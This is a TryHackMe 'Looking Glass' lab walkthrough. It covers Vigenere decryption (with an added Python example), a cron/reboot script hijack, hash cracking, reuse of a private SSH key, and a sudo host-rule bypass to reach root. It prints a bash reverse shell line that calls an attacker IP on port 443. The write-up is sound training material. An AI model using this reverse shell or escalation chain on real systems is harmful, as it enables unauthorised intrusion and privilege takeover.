
TryHackMe – Looking Glass Walkthrough

Introduction

This was an intermediate Linux machine that involved deciphering a password encrypted using the Vigenere cipher to gain initial access, exploiting a cron job to escalate to the tweedledum user, cracking user hashes to escalate to the humptydumpty user, accessing a private SSH key on the machine to escalate to the alice user and exploiting a misconfigured Sudo rule to escalate privileges to root.

Enumerating

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan has identified port 22 (SSH) and a large number of ports starting from port 9000, all running SSH. Performing a scan with the -p- flag to enumerate all of the open ports:

Enumerating SSH

When connecting to one of the ports (in this case trying one of the higher ones), the SSH server responds with “Higher”:

Whereas when connecting to port 9000, it responds with “Lower”:

This probably means the objective of the challenge is to find the right SSH port:

After a few more connection attempts, I was able to narrow it down to somewhere between 9800 and 9900:

Using a quick Bash for loop to find out the exact port:

for i in $(seq 9800 9900); do echo "connecting to port $i"; ssh -o 'LogLevel=ERROR' -o 'StrictHostKeyChecking=no' -p $i test@10.10.49.207;done | grep -vE 'Lower|Higher'

When a connection to port 9850 is made, it responds with a riddle:

When Googling for jabberwocky, it appears to be a poem and a sequel to Alice’s Adventures in Wonderland:

The number of characters appears to match the original poem, so perhaps a rotation has been used to encrypt it:

According to the application, it could be Vigenere, a method of encrypting alphabetic text using a series of interwoven Caesar ciphers whose shifts are determined by the letters of a keyword. Using an online Vigenere decryption tool to reveal the clear-text message:
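As an added example (not code from the original walkthrough), the cipher just described in Python: a decrypter, plus recovery of the key from known plaintext, which is exactly what the character-for-character match with the published poem makes possible. The sample line and the key LOOKING are constructed here and are not the values used on the box.

```python
# Added example: Vigenere decryption and known-plaintext key recovery.
# Sample line and key are constructed, not taken from the box.
import string

ALPHA = string.ascii_uppercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Apply the Vigenere cipher. Only letters are shifted, the key
    advances only on letters, and case and punctuation are preserved."""
    key = "".join(k for k in key.upper() if k.isalpha())
    out, ki = [], 0
    for ch in text:
        if ch.isalpha():
            shift = ALPHA.index(key[ki % len(key)])
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def recover_key(ciphertext: str, known_plain: str) -> str:
    """Known-plaintext attack: ciphertext letter minus plaintext letter
    gives one key letter; the key is the shortest period of that stream.
    Needs at least one full key length of matching text. Returns '' if
    the letter counts of the two inputs do not line up."""
    c = [ch for ch in ciphertext if ch.isalpha()]
    p = [ch for ch in known_plain if ch.isalpha()]
    if len(c) != len(p):
        return ""
    stream = "".join(ALPHA[(ord(a.upper()) - ord(b.upper())) % 26]
                     for a, b in zip(c, p))
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


# Constructed sample: a public-domain line of "Jabberwocky" and a made-up key.
SAMPLE_PLAIN = "'Twas brillig, and the slithy toves / Did gyre and gimble in the wabe"
SAMPLE_KEY = "LOOKING"

if __name__ == "__main__":
    ct = vigenere(SAMPLE_PLAIN, SAMPLE_KEY)
    print("ciphertext:", ct)
    print("decrypted :", vigenere(ct, SAMPLE_KEY, decrypt=True))
    print("key found :", recover_key(ct, SAMPLE_PLAIN))
```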

At the end of the poem, a secret is revealed. Connecting to port 9850 again and entering the secret returns a set of credentials:

Authenticating through SSH on port 22 with the credentials found above:

This has provided remote access to the box as the “jabberwock” user.

Privilege Escalation

Transferring the LinPEAS enumeration script with the Python Simple HTTP Server and Wget:

Executing the script:

It appears that a Bash script is set to run when the system reboots:

It also looks like the jabberwock user can execute reboot as root:

The twasBrillig.sh script is writable by the current user, so it can be changed to execute a reverse shell:

bash -i >& /dev/tcp/10.4.36.186/443 0>&1

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

When executing /sbin/reboot to restart the system, a callback on the Netcat listener is received, granting a shell as the tweedledum user:

When enumerating common files and directories, a file was found containing what looks like a number of hashes:

Using the Crackstation online cracking tool, all of these were cracked apart from one, which, judging by the others, seems to be the password:

Upon further inspection, the last one does not seem to be a hash at all; decoding it from hex reveals a password:

It turns out this was the password for the humptydumpty user, so switching to that user:

This user’s home directory does not seem to contain anything useful:

Although the alice user’s home directory does not allow listing its files, the .ssh folder inside it can still be accessed, and it appears to contain a private SSH key:

Copying its contents to a local file:

Assigning the appropriate permissions to the file and using it to authenticate as the alice user:

Executing LinPEAS again with the new access obtained through the enumeration performed earlier:

It appears that there is a Sudo rule for the alice user in the /etc/sudoers.d/alice file:

The following is the syntax used by sudoers files; this rule means alice can run /bin/bash as root, but only on the “ssalg-gnikool” host.

The -h flag can be used to specify the host when executing commands with Sudo:

Even though the host cannot be resolved, the commands are still executed as root, therefore granting a root-level shell.

Conclusion

This box was definitely not one of my favourites, as the initial part required a lot of unrealistic enumeration and guessing and did not really reflect a real-life engagement. The privilege escalation part was still quite interesting though.